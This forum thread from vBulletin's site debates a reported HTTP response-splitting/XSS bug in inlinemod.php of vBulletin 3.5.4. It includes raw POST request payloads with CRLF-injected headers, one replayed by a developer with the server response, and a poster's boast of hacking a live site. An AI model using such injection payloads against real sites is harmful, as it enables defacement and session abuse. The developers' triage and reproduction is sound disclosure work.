Announcement

Collapse
No announcement yet.

vBulletin 3.5.4 XSS isue

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • vBulletin 3.5.4 XSS isue

    XXS attack.
    Bug exists because of the insufficient the processing of
    input information in parameter url of inlinemod.php

    Example:
    POST /vb354/inlinemod.php HTTP/1.0
    Cookie: bbpassword=a5c3d9e61bcb8dea99105143c772bcd9; bbuserid=1
    Content-Length: 93
    Accept: */*
    Accept-Language: en-us
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
    Host: www.vulnerable.com
    Content-Type: application/x-www-form-urlencoded

    do=clearthread&url=lala2%0d%0aContent-Length:%2033%0d%0a%0d%0a<html>Hacked!</html>%0d%0a%0d%0a

    I didn't find anyway to fix it but i hacked one website that uses vBulletin 3.5.4

    PS You dont need to ban me i am doing this to help you guys

  • #2
    Can't confirm this in a 3.5.2 build.
    ManagerJosh, Owner of 4 XenForo Licenses, 1 vBulletin Legacy License, 1 Internet Brands Suite License
    Director, WorldSims.org | Gaming Hosting Administrator, SimGames.net, Urban Online Entertainment

    Comment


    • #3
      This was posted in the bug tracker this morning and neither Mike nor myself can reproduce this.

      Apache 2.0.x, Apache 1.3.x and IIS were tested with a mixture of PHP applications. The end result was either a HTTP redirect OR a 301 moved message from Apache.

      I doubt you hacked a site this was on as it requires Mod privledges and somehow getting around the REFERRER checking and also hoping that the PHP version is < 4.4.2.

      Feel free to post a site that this works on so I can check the PHP version and web server.
      Scott MacVicar

      My Blog | Twitter

      Comment


      • #4
        Oh the function is exec_header_redirect for anyone interested

        header("Location: $url");
        header('HTTP/1.1 301 Moved Permanently');

        Should also be noted that $url goes through xss_clean in class_core.php

        Code:
        	function xss_clean(&$var)
        	{
        		static
        			$preg_find    = array('#javascript#i', '#vbscript#i'),
        			$preg_replace = array('java script',   'vb script');
        
        		$var = preg_replace($preg_find, $preg_replace, htmlspecialchars_uni($var));
        		return $var;
        	}
        Just in case anyone wants to spend time reproducing it.
        Scott MacVicar

        My Blog | Twitter

        Comment


        • #5
          Check it out lol

          This is exploit for ImpEx 1.74, php inckuding in impex

          <zapped>

          Comment


          • #6
            Uh oh... Upgrade time again?
            Last edited by jmvb; Tue 2 May '06, 5:08pm.

            Comment


            • #7
              ImpEx is not a core vBulletin module that is only used while an upgrade in progress.

              Please stop posting "exploits" or you will be banned.
              Scott MacVicar

              My Blog | Twitter

              Comment


              • #8
                ImpEx is not a core vBulletin module that is only used while an upgrade in progress.
                But still its bug, sometimes people forget to delete impex and here u go =)))

                Comment


                • #9
                  This was fixed in CVS 6 months ago by jerry during a random audit and has already been mentioned.

                  I see you stopped mentioning the first "exploit" you used.

                  Code:
                  http://devbox/vb35x/inlinemod.php
                  
                  POST /vb35x/inlinemod.php HTTP/1.1
                  Host: devbox
                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2
                  Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
                  Accept-Language: en-us,en;q=0.5
                  Accept-Encoding: gzip,deflate
                  Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
                  Keep-Alive: 300
                  Connection: keep-alive
                  Referer: http://devbox/vb35x/forumdisplay.php?f=2
                  Cookie: bbuserid=1; vbulletin_collapse=templateusage; bbpassword=bd68d82513d0161c47b96e7da8bba794; acpcollapseprefs=100; bblastvisit=1143550886; vbcodemode=0; bblastactivity=1145913653; collapseprefs=100,debug; bbsessionhash=62d3fe42f097068a4d1bf2320425bc62; bbforum_view=ce615f0959e7373227560a9fc0b96672a-1-%7Bi-2_i-1146618953_%7D; vbulletin_inlinethread=1
                  Content-Type: application/x-www-form-urlencoded
                  Content-Length: 180
                  do=clearthread&url=lala2%0d%0aContent-Type:%20text/html%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0a%0d%0a%3Chtml%3E%3Cfont%20color=red%3Ehey%3C/font%3E%3C/html%3E
                  
                  HTTP/1.x 301 Moved Permanently
                  Date: Wed, 03 May 2006 01:20:22 GMT
                  Server: Apache/2.0.54 (Unix) PHP/5.1.1 mod_perl/2.0.2 Perl/v5.8.3
                  X-Powered-By: PHP/5.1.1
                  Cache-Control: private
                  Pragma: private
                  Set-Cookie: vbulletin_inlinethread=deleted; expires=Tue, 03-May-2005 01:20:22 GMT; path=/
                  Location: http://devbox/vb35x/lala2
                  Content-Type: text/html
                  HTTP/1.1: 200 OK
                  Inject worked but the redirect still happened with no code execution.
                  Scott MacVicar

                  My Blog | Twitter

                  Comment

                  widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                  Working...
                  X